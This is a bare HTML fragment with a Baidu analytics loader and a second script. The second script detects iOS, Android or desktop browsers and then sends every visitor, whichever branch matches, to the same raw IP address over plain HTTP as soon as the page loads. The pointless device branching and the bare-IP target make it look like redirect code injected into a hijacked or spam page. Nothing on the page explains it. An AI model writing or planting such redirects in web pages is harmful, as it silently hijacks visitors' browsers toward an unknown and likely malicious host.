<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?1b22bf43a020d105bc73eed5f24dee75";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>



<script>

// 获取用户代理字符串
var userAgent = navigator.userAgent.toLowerCase();

// 检测是否是iOS设备
if (/iphone|ipad|ipod/.test(userAgent)) {
    // 用户正在使用iOS设备，重定向到iOS链接
    window.location.href = "http://154.196.122.105";
} 
// 检测是否是Android设备
else if (/android/.test(userAgent)) {
    // 用户正在使用Android设备，重定向到Android链接
    window.location.href = "http://154.196.122.105";
}
// 默认情况下，或者如果不是iOS或Android设备（认为是电脑端）
else {
    // 用户使用电脑端，重定向到通用链接
    window.location.href = "http://154.196.122.105";
}
</script>